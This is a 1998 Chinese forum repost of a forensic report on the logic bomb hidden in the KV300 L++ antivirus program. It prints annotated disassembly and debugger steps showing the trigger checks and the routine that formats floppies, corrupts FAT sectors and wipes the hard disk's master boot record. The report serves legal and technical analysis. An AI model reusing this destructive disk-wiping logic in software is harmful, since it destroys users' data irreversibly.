精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 电脑病毒>>★请不要忘记KV逻辑炸弹★>>资料:一份帮助认定江民KV300违法活动的

主题:资料:一份帮助认定江民KV300违法活动的
发信人: jmbomb()
整理人: (1998-08-12 13:06:19), 站内信件
            资料:一份帮助认定江民KV300违法活动的分析报告

    1997年夏末,江民逻辑炸弹丑闻彻底败露。为了挽回影响,当事人利用种种
手段说情或阻挠公安部门执法。其中包括了通过关系向公安部某领导说情,以及
找关系到电视台阻挠关于逻辑炸弹的节目的播出,并通过媒体为其违法行为辩护,
并将逻辑炸弹宣传为反盗版的英雄。这一切使得公安部计算机安全监察司和其他
部门的有关领导拍案而起。在上级的监督和舆论的强大压力下,北京市公安局计
算机安全监察处排除了种种干扰,终于作出了最后的结论。随后进行的全国反病
毒软件测试在天津进行。KV300 的低劣质量在测试中暴露无疑。

    下面的这份报告就是当时协助专家进行分析验证的最权威的一份报告。这份
报告是首次披露。今天我们看到这些就如同听到了警钟长鸣。


                     KV300 L++有害数据分析

实验环境
========

计算机环境:486DX4/100 100%兼容机、MS-DOS 6.22操作系统、BIOS中
软盘交换选项(Floppy Swap)为禁止(Diable).

程序跟踪工具:Softice 2.80 for MS-DOS,缺省配置(可删除
c:\si\soft-ice.dat)

软件设置:
config.sys
device=c:\si\s-ice.exe (Softice 2.80位于C:\SI目录中)
device=c:\dos\himem.exe (同时不能安装其它内存管理软件)

autoexec.bat
path=c:\si;...

准备工作:
mk300v4 加工普通1.44M磁盘,KV300L++(是江民公司在网上发布的两个
KV300 L++中较早的那一个版本,另一个版本同样也具有有害数据,其触发条
件、分析手段和结果与此完全相同)
KV300.EXE(83316字节),拷贝kv300整个软件到c:\KV300并cd\KV300.

操作过程
C:\KV300>ldr KV300.EXE[回车]
:win[回车]
:wr[回车]
:wc 25[回车]
:bpm cs+ee1:27dc x[回车]
:g[回车]
获得下面的程序段(1),(跟踪获得的程序段地址会由于计算机的不同而有差异)
:g 2b2
获得下面的程序段(2)
:u 2d7[回车]
获得下面的程序段(3)
:g 2fd[回车]
获得下面的程序段(4)
:u 320[回车]
获得下面的程序段(5)
:u[回车]
获得下面的程序段(6)
:u[回车]
获得下面的程序段(7)

注:上面的程序段在Softice中可以通过屏幕打印来获得。



KV300 L++有害代码采集结果
=========================

程序段(1)
AX=0001 BX=CD72 CX=50F1 DX=0001 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=27DC o d I s Z a 
P c t
385B:27DA EBC6          JMP     27A2
385B:27DC 81EB0001      SUB     BX,0100
385B:27E0 268B970008    MOV     DX,ES:[BX+0800]
385B:27E5 D1C2          ROL     DX,1
385B:27E7 D1C2          ROL     DX,1
385B:27E9 D0E2          SHL     DL,1
385B:27EB 89161FCC      MOV     [CC1F],DX
385B:27EF 1E            PUSH    DS
385B:27F0 33C0          XOR     AX,AX
385B:27F2 8ED8          MOV     DS,AX
385B:27F4 C606250502    MOV     BYTE PTR [0525],02
385B:27F9 1F            POP     DS
385B:27FA CB            RETF
385B:27FB 9AB8572D3D    CALL    3D2D:57B8
385B:2800 8D36003B      LEA     SI,[3B00]
385B:2804 BB0000        MOV     BX,0000
385B:2807 803E1A7200    CMP     BYTE PTR [721A],00
385B:280C 7403          JZ      2811
385B:280E BB0005        MOV     BX,0500
385B:2811 817804B104    CMP     WORD PTR [BX+SI+04],04B1

程序段(2)
AX=0001 BX=CD72 CX=50F1 DX=0001 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=02B2 o d I s Z a 
P c t
385B:02AF E92901        JMP     03DB
385B:02B2 8B07          MOV     AX,[BX]                    DS:CD72=4E4E
385B:02B4 268B970008    MOV     DX,ES:[BX+0800]
385B:02B9 D1C2          ROL     DX,1
385B:02BB D1C2          ROL     DX,1
385B:02BD D0E2          SHL     DL,1
385B:02BF 8916EA71      MOV     [71EA],DX
385B:02C3 3D4E4E        CMP     AX,4E4E
385B:02C6 7527          JNZ     02EF
385B:02C8 3B4702        CMP     AX,[BX+02]
385B:02CB 751D          JNZ     02EF
385B:02CD 3A4704        CMP     AL,[BX+04]
385B:02D0 7522          JNZ     02EF
385B:02D2 3A4705        CMP     AL,[BX+05]
385B:02D5 7418          JZ      02EF
385B:02D7 B80F05        MOV     AX,050F
385B:02DA BB0000        MOV     BX,0000
385B:02DD B90100        MOV     CX,0001
385B:02E0 BA0000        MOV     DX,0000
385B:02E3 CD13          INT     13

程序段(3)
AX=0001 BX=CD72 CX=50F1 DX=0001 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=02B2 o d I s Z a 
P c t
385B:02D7 B80F05        MOV     AX,050F
385B:02DA BB0000        MOV     BX,0000
385B:02DD B90100        MOV     CX,0001
385B:02E0 BA0000        MOV     DX,0000
385B:02E3 CD13          INT     13
385B:02E5 B80F05        MOV     AX,050F
385B:02E8 B201          MOV     DL,01
385B:02EA CD13          INT     13
385B:02EC E9F701        JMP     04E6
385B:02EF 8B4703        MOV     AX,[BX+03]
385B:02F2 3B4706        CMP     AX,[BX+06]
385B:02F5 7406          JZ      02FD
385B:02F7 E9EC01        JMP     04E6
385B:02FA E9DE00        JMP     03DB
385B:02FD A11FCC        MOV     AX,[CC1F]
385B:0300 3B06EA71      CMP     AX,[71EA]
385B:0304 74F4          JZ      02FA
385B:0306 3DC2E1        CMP     AX,[E1C2]
385B:0309 74EF          JZ      02FA
385B:030B 3D0000        CMP     AX,0000

程序段(4)
AX=4E4E BX=CD72 CX=50F1 DX=E1C2 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=02FD o d I s Z a 
P c t
385B:02FA E9DE00        JMP     03DB
385B:02FD A11FCC        MOV     AX,[CC1F]                  DS:CC1F=DBB6
385B:0300 3B06EA71      CMP     AX,[71EA]
385B:0304 74F4          JZ      02FA
385B:0306 3DC2E1        CMP     AX,E1C2
385B:0309 74EF          JZ      02FA
385B:030B 3D0000        CMP     AX,0000
385B:030E 74EA          JZ      02FA
385B:0310 813EEA71C2E1  CMP     WORD PTR [71EA],E1C2
385B:0316 75E2          JNZ     02FA
385B:0318 813E4ACDE5E5  CMP     WORD PTR [CD4A],E5E5
385B:031E 74DA          JZ      02FA
385B:0320 B80F02        MOV     AX,020F
385B:0323 8D1E72CD      LEA     BX,[CD72]
385B:0327 B90100        MOV     CX,0001
385B:032A BA8001        MOV     DX,0180
385B:032D CD13          INT     13
385B:032F B90020        MOV     CX,2000
385B:0332 FE07          INC     BYTE PTR [BX]
385B:0334 43            INC     BX

程序段(5)
AX=4E4E BX=CD72 CX=50F1 DX=E1C2 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=02FD o d I s Z a 
P c t
385B:0320 B80F02        MOV     AX,020F
385B:0323 8D1E72CD      LEA     BX,[CD72]
385B:0327 B90100        MOV     CX,0001
385B:032A BA8001        MOV     DX,0180
385B:032D CD13          INT     13
385B:032F B90020        MOV     CX,2000
385B:0332 FE07          INC     BYTE PTR [BX]
385B:0334 43            INC     BX
385B:0335 E2FB          LOOP    0332 
385B:0337 B80F03        MOV     AX,030F
385B:033A 8D1E72CD      LEA     BX,[CD72]
385B:033E B90100        MOV     CX,0001
385B:0341 CD13          INT     13
385B:0343 B80F02        MOV     AX,020F
385B:0346 8D1E72CD      LEA     BX,[CD72]
385B:034A B90400        MOV     CX,0004
385B:034D BA8003        MOV     DX,0380
385B:0350 CD13          INT     13
385B:0352 B90020        MOV     CX,2000
385B:0355 FE07          INC     BYTE PTR [BX]

程序段(6)
AX=4E4E BX=CD72 CX=50F1 DX=E1C2 SP=01D6 BP=0000 SI=3B02 
DI=0003 FS=187
GS=0000 DS=2864 ES=2864 SS=42AD CS=385B IP=02FD o d I s Z a 
P c t
385B:0357 43            INC     BX
385B:0358 E2FB          LOOP    0355
385B:035A B80F03        MOV     AX,030F
385B:035D 8D1E72CD      LEA     BX,[CD72]
385B:0361 B90400        MOV     CX,0004
385B:0364 CD13          INT     13
385B:0366 B80202        MOV     AX,0202
385B:0369 8D1E72CD      LEA     BX,[CD72]
385B:036D B90100        MOV     CX,0001
385B:0370 BA8000        MOV     DX,0080
385B:0373 CD13          INT     13
385B:0375 B90002        MOV     CX,0200
385B:0378 26C7070000    MOV     WORD PTR ES:[BX],0000
385B:037D 83C302        ADD     BX,+02
385B:0380 E2F6          LOOP    0378
385B:0382 8D1E72CD      LEA     BX,[CD72]
385B:0386 26C687E20104  MOV     BYTE PTR ES:[BX+01E2],04
385B:038C 26C687F00102  MOV     BYTE PTR ES:[BX+01F0],02
385B:0392 26C687F20105  MOV     BYTE PTR ES:[BX+01F2],05
385B:0398 26C687FB0150  MOV     BYTE PTR ES:[BX+01FB],50

程序段(7)
385B:039E 26C687FE0155AA     MOV    WORD PTR ES:[BX+01FE],AA55
385B:03A5 26C687E20304       MOV    BYTE PTR ES:[BX+03E2],04
385B:03AB 26C687F00302       MOV    BYTE PTR ES:[BX+03F0],02
385B:03B1 26C687F20305       MOV    BYTE PTR ES:[BX+03F2],05
385B:03B7 26C687FB0350       MOV    BYTE PTR ES:[BX+03FB],50
385B:03BD 26C687FE0355AA     MOV    WORD PTR ES:[BX+03FE],AA55
385B:03C4 B80203        MOV     AX,0302
385B:03C7 8D1E72CD      LEA     BX,[CD72]
385B:03CB B90100        MOV     CX,0001
385B:03CE BA8000        MOV     DX,0080
385B:03D1 CD13          INT     13
385B:03D3 9A00020000    CALL    0000:0200
385B:03D8 E90B01        JMP     04E6
385B:03DB BF0300        MOV     DI,0003
385B:03DE B601          MOV     DH,01
385B:03E0 8A1693CC      MOV     DL,[CC93]
385B:03E4 8D1E72CD      LEA     BX,[CD72]
385B:03E8 B9C250        MOV     CX,50C2
385B:03EB C78702043412  MOV     WORD PTR [BX+0402],1234
385B:03F1 B80102        MOV     AX,0201


KV300 L++有害代码分析
=====================

;下述程序取自程序段(1),其主要目的是检测加密磁道的开始就计算80道0
;面指纹数据偏移量700h处的变换结果,并将之保存到[CC1F]中,为后面的
;判断对比作准备

385B:27DC 81EB0001      SUB     BX,0100

;取出80道0面指纹数据偏移量700h处的值

385B:27E0 268B970008    MOV     DX,ES:[BX+0800]

;进行简单变换

385B:27E5 D1C2          ROL     DX,1
385B:27E7 D1C2          ROL     DX,1
385B:27E9 D0E2          SHL     DL,1

;保存变换结果于[CC1F]中,只有对于后期KV300磁盘,DX中的值才是E1C2。

385B:27EB 89161FCC      MOV     [CC1F],DX

;下面的各段程序分别取自程序段(2)~(7)。

;KV300 L++鉴别原版磁盘的标准:
;早期KV300磁盘:80道0面指纹数据偏移量800h和700h处都不是7878h
;后期KV300磁盘:80道0面指纹数据偏移量800h和700h处都是7878h
;MK300V4加工的磁盘:80道0面指纹数据偏移量仅在800h处是7878h
;值7878h进行上述程序中的简单变换的结果为E1C2,该值是KV300 L++判断
;软盘是否为原版磁盘的主要标准

385B:02AF E92901        JMP     03DB
385B:02B2 8B07          MOV     AX,[BX]                DS:CD72=4E4E

;取得80道0面指纹数据偏移量800h处的数据,判定80道的根据是当前的
;CH寄存器的值

385B:02B4 268B970008    MOV     DX,ES:[BX+0800]

;对该数据作简单的变换

385B:02B9 D1C2          ROL     DX,1
385B:02BB D1C2          ROL     DX,1
385B:02BD D0E2          SHL     DL,1

;保存变换结果于[71EA],对于早期KV300磁盘,变换结果不是E1C2h,
;对于MK300V4加工的磁盘和后期KV300版本都是E1C2h。

385B:02BF 8916EA71      MOV     [71EA],DX

;下面的代码是判断MK300V4以外的另一种仿真KV300磁盘的加工工具所生成的
;磁盘的,一旦条件满足则对两个软驱中假如存在的任何磁盘实施格式化操作。
;这个过程对数据进行了不可恢复的破坏。

;判断条件是否满足,触发条件是第80道0面的指纹数据前5个为4E,而第六个
;不是。

385B:02C3 3D4E4E        CMP     AX,4E4E
385B:02C6 7527          JNZ     02EF
385B:02C8 3B4702        CMP     AX,[BX+02]
385B:02CB 751D          JNZ     02EF
385B:02CD 3A4704        CMP     AL,[BX+04]
385B:02D0 7522          JNZ     02EF
385B:02D2 3A4705        CMP     AL,[BX+05]
385B:02D5 7418          JZ      02EF

;条件满足时,对两个软驱中的磁盘实施格式化0头0道的破坏性操作

385B:02D7 B80F05        MOV     AX,050F
385B:02DA BB0000        MOV     BX,0000
385B:02DD B90100        MOV     CX,0001
385B:02E0 BA0000        MOV     DX,0000
385B:02E3 CD13          INT     13
385B:02E5 B80F05        MOV     AX,050F
385B:02E8 B201          MOV     DL,01
385B:02EA CD13          INT     13
385B:02EC E9F701        JMP     04E6

385B:02EF 8B4703        MOV     AX,[BX+03]
385B:02F2 3B4706        CMP     AX,[BX+06]
385B:02F5 7406          JZ      02FD
385B:02F7 E9EC01        JMP     04E6
385B:02FA E9DE00        JMP     03DB

;下面的代码用于判断软盘是否由MK300V4加工而成。

;如前所述,[CC1F]中存放的值是前面程序存入的一个标志,该标志存放的是
;80道0面指纹数据偏移量700h处的变换结果。对于早期KV300磁盘和MK300V4
;加工的磁盘,变换结果不是E1C2h,对于后期KV300版本则是E1C2h。[71EA]
;中存放的值是前面程序存入的一个标志,该标志存放的是80道0面指纹数据
;偏移量800h处的变换结果。对于早期KV300磁盘,变换结果不是E1C2h,对于
;MK300V4加工的磁盘和后期KV300版本都是E1C2h。

            早期的KV300磁盘     后期的KV300磁盘     MK300V4加工的盘
-------------------------------------------------------------------
[CC1F]/o700    !=E1C2               =E1C2               !=E1C2
[71EA]/o800    !=E1C2               =E1C2               =E1C2

385B:02FD A11FCC        MOV     AX,[CC1F]
385B:0300 3B06EA71      CMP     AX,[71EA]
385B:0304 74F4          JZ      02FA
385B:0306 3DC2E1        CMP     AX,E1C2
385B:0309 74EF          JZ      02FA
385B:030B 3D0000        CMP     AX,0000
385B:030E 74EA          JZ      02FA
385B:0310 813EEA71C2E1  CMP     WORD PTR [71EA],E1C2
385B:0316 75E2          JNZ     02FA
385B:0318 813E4ACDE5E5  CMP     WORD PTR [CD4A],E5E5
385B:031E 74DA          JZ      02FA

;KV300 L++有害数据实施破坏的部分

;读取从0道1面1扇区开始的15个扇区的数据,通常是C盘的引导记录和第
;一份文件分配表的开始部分

385B:0320 B80F02        MOV     AX,020F
385B:0323 8D1E72CD      LEA     BX,[CD72]
385B:0327 B90100        MOV     CX,0001
385B:032A BA8001        MOV     DX,0180
385B:032D CD13          INT     13

;对刚才得到的数据进行变换,即每个字节加1

385B:032F B90020        MOV     CX,2000
385B:0332 FE07          INC     BYTE PTR [BX]
385B:0334 43            INC     BX
385B:0335 E2FB          LOOP    0332 

;将变换后的数据写回原来的位置

385B:0337 B80F03        MOV     AX,030F
385B:033A 8D1E72CD      LEA     BX,[CD72]
385B:033E B90100        MOV     CX,0001
385B:0341 CD13          INT     13

;读取从0道3面4扇区开始的15个扇区的数据,对于较大的硬盘,仍然在
;第一份文件分配表内,而对于较小的硬盘则有可能在第二份文件分配表内甚至
;在目录区或数据区内。

385B:0343 B80F02        MOV     AX,020F
385B:0346 8D1E72CD      LEA     BX,[CD72]
385B:034A B90400        MOV     CX,0004
385B:034D BA8003        MOV     DX,0380
385B:0350 CD13          INT     13

;对刚才得到的数据进行变换,即每个字节加1

385B:0352 B90020        MOV     CX,2000
385B:0355 FE07          INC     BYTE PTR [BX]
385B:0357 43            INC     BX
385B:0358 E2FB          LOOP    0355

;将变换后的数据写回原来的位置

385B:035A B80F03        MOV     AX,030F
385B:035D 8D1E72CD      LEA     BX,[CD72]
385B:0361 B90400        MOV     CX,0004
385B:0364 CD13          INT     13

;读取硬盘的0道0面1扇区和0道0面2扇区,其中0道0面1扇区是硬盘
;的主引导程序和硬盘分区表所在的扇区(即主引导扇区),0道0面2扇区对于
;典型MS-DOS分区没有实质性的作用,但通常可能被某些备份程序用于备份主
;引导扇区或其他重要数据,而对于其他分区类型则一般是重要数据的存放区域。

385B:0366 B80202        MOV     AX,0202
385B:0369 8D1E72CD      LEA     BX,[CD72]
385B:036D B90100        MOV     CX,0001
385B:0370 BA8000        MOV     DX,0080
385B:0373 CD13          INT     13

;清除读取的部分。注意,这些不可恢复的清除操作是在没有任何备份的前提下
;进行的,使得受损害的硬盘仅当属于典型MS-DOS分区时,才有可能进行重建
;而不是从某个备份中进行恢复。

385B:0375 B90002        MOV     CX,0200
385B:0378 26C7070000    MOV     WORD PTR ES:[BX],0000
385B:037D 83C302        ADD     BX,+02
385B:0380 E2F6          LOOP    0378

;下面的代码负责导致计算机不能从硬盘引导,也不能从高版本的MS-DOS软盘
;上启动这个效果和合肥1号(或称所谓的“8888变形鬼魂”病毒)发作的结果相似。

385B:0382 8D1E72CD      LEA     BX,[CD72]
385B:0386 26C687E20104  MOV     BYTE PTR ES:[BX+01E2],04
385B:038C 26C687F00102  MOV     BYTE PTR ES:[BX+01F0],02
385B:0392 26C687F20105  MOV     BYTE PTR ES:[BX+01F2],05
385B:0398 26C687FB0150  MOV     BYTE PTR ES:[BX+01FB],50
385B:039E 26C687FE0155AA     MOV    WORD PTR ES:[BX+01FE],AA55
385B:03A5 26C687E20304       MOV    BYTE PTR ES:[BX+03E2],04
385B:03AB 26C687F00302       MOV    BYTE PTR ES:[BX+03F0],02
385B:03B1 26C687F20305       MOV    BYTE PTR ES:[BX+03F2],05
385B:03B7 26C687FB0350       MOV    BYTE PTR ES:[BX+03FB],50
385B:03BD 26C687FE0355AA     MOV    WORD PTR ES:[BX+03FE],AA55
385B:03C4 B80203        MOV     AX,0302
385B:03C7 8D1E72CD      LEA     BX,[CD72]
385B:03CB B90100        MOV     CX,0001
385B:03CE BA8000        MOV     DX,0080
385B:03D1 CD13          INT     13

;造成死机,并且从此计算机无法引导。

385B:03D3 9A00020000    CALL    0000:0200


小   结
==========

1. 江民公司曾经发布过两个KV300 L++版本,这两个版本在有害数据方面几
乎没有差异,在相同的触发条件下对用户的侵害结果也相同;

2. 在支持软盘驱动器SWAP的计算机上,当设置成驱动器SWAP状态时,在少
数计算机上仿真磁盘有可能不会触发KV300 L++的破坏行为;如果在安装
有QEMM等高级内存管理软件的硬盘中启动KV300,KV300本身可能根本
无法运行起来,其破坏程序也就不能表现;

3. 尽管看上去KV300 L++的破坏程序主要针对MK300V4加工的磁盘,但是
构成KV300 L++破坏行为的触发条件不是单一的,KV300 L++破坏程序及
其过于简单的触发机制的客观存在给其它外界诱导因素触发该破坏程序带
来了众多可能性,例如磁盘的不稳定性、驻留辅助磁盘管理程序的影响、具
有针对性的病毒的侵害、KV300原版磁盘的指纹数据无意中被更改都可能
成为触发的因素;

4. 类似MK300V4加工的特殊软盘不会引发KV300 L++在破坏数据中执行格
式化软盘的操作,这个破坏是由另一种仿真磁盘或其它外界因素诱导出来
的,而软盘被格式化后,数据是根本无法复原的;

5. 在启动Softice的ldr程序装入kv300后,使用“bpint 13”命令进
行跟踪,在有限的几步之后即可跟踪到实施破坏的程序段,由此可以明确证
实在实施破坏之前,KV300 L++对于硬盘主引导扇区及其后面的一个扇区
没有进行任何备份;

6. 从上述分析中可以明确地看出,KV300 L++对硬盘主引导扇区及其后一个
扇区所实施的破坏是不可逆的。尽管对仅有标准DOS分区的硬盘,主引导
扇区可以重建,但是也不能保证重建结果与原有数据完全一致。KV300 L++
对硬盘主引导扇区后一个扇区所实施的破坏则完全不可能重建。这使得硬盘
上可能装有Windows NT分区、OS/2分区、UNIX/XENIX/LINUX分区等
非DOS分区,以及由DM、ADM、SYSTEM COMMANDER等高级硬盘管理软
件所管理的DOS分区的硬盘上的主引导数据彻底丢失。造成的后果就是硬
盘上的一切数据完全无法恢复。


--
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: 202.96.151.219]

[关闭][返回]